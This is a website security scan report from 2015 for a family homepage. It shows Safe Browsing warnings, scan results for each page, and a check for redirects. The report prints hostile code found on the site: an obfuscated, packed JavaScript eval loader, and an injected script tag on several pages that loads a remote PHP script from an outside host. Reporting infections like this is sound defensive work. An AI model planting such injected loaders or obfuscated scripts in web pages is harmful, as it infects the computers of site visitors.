Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=leuthauserfamily.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://leuthauserfamily.net/ | 200 OK Content-Length: 5488 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var O11='KkSKpcCfngCdpxGcz5yJwRHdoxXawFWeyVWdxpGfvZmbpx3YyNHfl52buF0M8VGdpJ3d8VWbhJnZpxXZtFmTnFGV5J0c05WZtVGbFRXZnxHZslGaDRmblBHchxnZlJHfMJVV8Rnbl1WZsVUZ0FWZyNGflxWe0NHMywnclJnclZWZyx3YyNHMyw3YyNHdldGf1VGfBNDf5FGbwNXakJjM8N3YpRXaxEmbhx3avxHc0RHayIDfyNjMywHdwlmcjN3QzwXZtFmcml2QzwHa0RWa3BjM8RHanlWZoBjM8VWMn92bnxHMyIDfsJXd8V0M8FjMywXZwF2YzV2X8dmbpxGbvJ3YzBjM8VGchN2cl5Wd8RWYlhGfv5mMywHduVmbvBXbvNUSSVVZk92YuVGfENDf0ETM8JjN8lDN8JXY2xHduVWb1N2bkxXSJxGfPBTMfx3QzwHf0BXayN2c8JXZkJ3biVWbhJnZwIDflR2bDJXYoNU Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1X(1Q(p,a,c,k,e,d){e=1Q(c){1R(c<a?\'\':e(25(c/a)))+((c=c%a)>21?1T.26(c+29):c.1Z(1Y))};1S(!\'\'.1V(/^/,1T)){1U(c--){d[e(c)]=k[c]||e(c)}k=[1Q(e){1R d[e]}];e=1Q(){1R\'\\\\w+\'};c=1};1U(c--){1S(k[c]){p=p.1V(1W 23(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}1R p}(\'14(O(p,a,c,k,e,d Antivirus reports:
| ||
http://leuthauserfamily.net/pictures.htm | 200 OK Content-Length: 5073 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://bouwwerkenkthys.be/js/vyxt9jrz.php?id=3490513"></script> | ||
http://leuthauserfamily.net/index.htm | 200 OK Content-Length: 5488 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var O11='KkSKpcCfngCdpxGcz5yJwRHdoxXawFWeyVWdxpGfvZmbpx3YyNHfl52buF0M8VGdpJ3d8VWbhJnZpxXZtFmTnFGV5J0c05WZtVGbFRXZnxHZslGaDRmblBHchxnZlJHfMJVV8Rnbl1WZsVUZ0FWZyNGflxWe0NHMywnclJnclZWZyx3YyNHMyw3YyNHdldGf1VGfBNDf5FGbwNXakJjM8N3YpRXaxEmbhx3avxHc0RHayIDfyNjMywHdwlmcjN3QzwXZtFmcml2QzwHa0RWa3BjM8RHanlWZoBjM8VWMn92bnxHMyIDfsJXd8V0M8FjMywXZwF2YzV2X8dmbpxGbvJ3YzBjM8VGchN2cl5Wd8RWYlhGfv5mMywHduVmbvBXbvNUSSVVZk92YuVGfENDf0ETM8JjN8lDN8JXY2xHduVWb1N2bkxXSJxGfPBTMfx3QzwHf0BXayN2c8JXZkJ3biVWbhJnZwIDflR2bDJXYoNU Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1X(1Q(p,a,c,k,e,d){e=1Q(c){1R(c<a?\'\':e(25(c/a)))+((c=c%a)>21?1T.26(c+29):c.1Z(1Y))};1S(!\'\'.1V(/^/,1T)){1U(c--){d[e(c)]=k[c]||e(c)}k=[1Q(e){1R d[e]}];e=1Q(){1R\'\\\\w+\'};c=1};1U(c--){1S(k[c]){p=p.1V(1W 23(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}1R p}(\'14(O(p,a,c,k,e,d Antivirus reports:
| ||
http://leuthauserfamily.net/movies.htm | 200 OK Content-Length: 1769 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://bouwwerkenkthys.be/js/vyxt9jrz.php?id=3490511"></script> | ||
http://leuthauserfamily.net/contact.htm | 200 OK Content-Length: 4770 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://bouwwerkenkthys.be/js/vyxt9jrz.php?id=3490508"></script> | ||
http://leuthauserfamily.net/news.htm | 200 OK Content-Length: 10729 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://bouwwerkenkthys.be/js/vyxt9jrz.php?id=3490512"></script> | ||
http://leuthauserfamily.net/test404page.js | HTTP/1.1 404 Not Found Connection: close Date: Tue, 03 Mar 2015 21:44:10 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html | clean |
http://templates.doteasy.com/errorpages/error404/ | 200 OK Content-Length: 10599 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.8.2/jquery.min.js | 200 OK Content-Length: 93435 Content-Type: text/javascript | clean |
http://leuthauserfamily.net/js/selectBox/jquery.selectBox.min.js | HTTP/1.1 404 Not Found Connection: close Date: Tue, 03 Mar 2015 21:44:12 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html | clean |
http://templates.doteasy.com/test404page.js | 404 Not Found Content-Length: 1245 Content-Type: text/html | clean |
http://leuthauserfamily.net/js/jquery.watermark.min.js | HTTP/1.1 404 Not Found Connection: close Date: Tue, 03 Mar 2015 21:44:13 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html | clean |
http://leuthauserfamily.net/js/fancybox/jquery.fancybox.js | HTTP/1.1 404 Not Found Connection: close Date: Tue, 03 Mar 2015 21:44:14 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html | clean |
http://leuthauserfamily.net/js/fancybox/helpers/jquery.fancybox-media.js | HTTP/1.1 404 Not Found Connection: close Date: Tue, 03 Mar 2015 21:44:15 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html | clean |
http://leuthauserfamily.net/poker.zip | HTTP/1.1 404 Not Found Connection: close Date: Tue, 03 Mar 2015 21:44:15 GMT Accept-Ranges: bytes Server: Apache Content-Length: 124 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: leuthauserfamily.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 Mar 2015 21:44:06 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 5488
Content-Type: text/html
Last-Modified: Sun, 07 Dec 2014 13:34:44 GMT
...5488 bytes of data.
GET / HTTP/1.1
Host: leuthauserfamily.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 Mar 2015 21:44:06 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 5488
Content-Type: text/html
Last-Modified: Sun, 07 Dec 2014 13:34:44 GMT
...5488 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: leuthauserfamily.net
Referer: http://www.google.com/search?q=leuthauserfamily.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: leuthauserfamily.net
Referer: http://www.google.com/search?q=leuthauserfamily.net
Result:
The result is similar to the first query. There are no suspicious redirects found.